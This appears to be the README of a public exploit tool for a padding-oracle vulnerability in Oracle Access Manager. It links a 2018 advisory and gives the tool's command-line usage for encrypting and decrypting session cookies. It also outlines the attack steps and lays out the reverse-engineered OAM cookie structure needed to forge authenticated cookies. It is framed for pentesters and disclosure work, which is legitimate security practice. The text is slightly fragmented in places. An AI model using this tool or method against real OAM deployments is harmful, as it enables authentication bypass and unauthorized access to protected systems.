Introduction
https://www.sec-consult.com/en/blog/2018/05/oracle-access-managers-identity-crisis/
Requirments
The exploit depend on python-paddingoracle it can be downloaded from here
https://github.com/mwielgoszewski/python-paddingoracle
How the exploit works
# python oracle-oam-exploit.py -h
####### # # # #######
# # # # ## ## # # # ##### # #### # #####
# # # # # # # # # # # # # # # # # #
# # # # # # # ##### ## # # # # # # #
# # ####### # # # ## ##### # # # # #
# # # # # # # # # # # # # # #
####### # # # # ####### # # # ###### #### # #
Oracle Padding Oracle
coded by: Mostafa Soliman
usage: oracle-oam-exploit.py [-h] [-e ENCRYPT] [-d DECRYPT] [-v] URL
positional arguments:
URL Target resource URL
optional arguments:
-h, --help show this help message and exit
-e ENCRYPT, --encrypt ENCRYPT
Encrypt plain text data
-d DECRYPT, --decrypt DECRYPT
Decrypt base64 encode cipher text
-v, --verb Show decrypt block info
- find the correct length that results in adding new padding block
- brute-force the correct prefix that will be used in future encryption and decryption (magic block)
-d flag.The pentester can specify any plain text value he wish to encrypt using the
-e flag.Constructing a fake cookie
by reversing oracle OAM sdk we can see that the cookie consists of the below structure
Salt= ACL= AuthId= Ip= TCT= SessionId= userId= validate=BASE64Encode(MD5(Salt+AuthId+Ip+ACL+TCT+SessionId))
-d flag, modify it then encrypt it again using -e.Example of decrypting a cookie
